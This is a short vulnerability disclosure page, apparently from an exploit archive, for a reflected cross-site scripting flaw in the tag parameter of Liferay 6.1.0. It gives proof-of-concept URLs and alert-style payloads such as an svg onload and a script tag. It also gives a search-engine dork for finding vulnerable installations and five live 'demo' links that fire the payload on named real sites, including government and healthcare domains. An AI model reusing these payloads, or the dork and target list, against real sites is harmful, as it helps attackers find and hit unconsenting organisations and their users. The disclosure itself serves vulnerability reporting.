Liferay 6.1.0 tags Cross Site Scripting (XSS)

2017.12.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Title: Liferay 6.1.0 tags Cross Site Scripting (XSS) [+] Date: 2017-12-22 [+] Author: Mostafa Gharzi [+] Vendor Homepage: www.Liferay.com [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable File: p_r_p_564233524_tag= [+] Vulnerable Parameter: Get Method [+} Dorks : inurl:p_r_p_564233524_tag= intext:"Content with tag" ### POC: [+} http://Site/home?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS] [+} http://Site/[Another name]?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS] ### Xss Alert Code: "><svg onload=alert(/xss/)> '><script>alert('xss');</script> And Etc. ### Demo: [+] http://antares.crea.gov.it:8080/en/tagcloud?p_p_id=148_INSTANCE_OFaFgv1XLKmW&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=5&p_p_col_count=6&p_r_p_564233524_resetCur=true&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E [+] http://liferayportal.ir/web/pdn/19?p_p_id=101_INSTANCE_35mBiQIthh4N&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=2&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E [+] http://www.carpentaria.qld.gov.au/home?p_p_id=101_INSTANCE_pUO347Uam9DO&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-3&p_p_col_count=1&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E [+] http://www.alliance-healthcare.co.uk/latest-news?p_p_id=101_INSTANCE_jL0I&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E [+] http://www.acmotec.com/ricerca-tags.html?p_p_id=148_INSTANCE_4LMOXz4UkLZN&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=4&p_p_col_count=6&p_r_p_564233524_resetCur=true&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E ### Special Thanks: [+] CertCC.ir [+] Gucert.ir


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top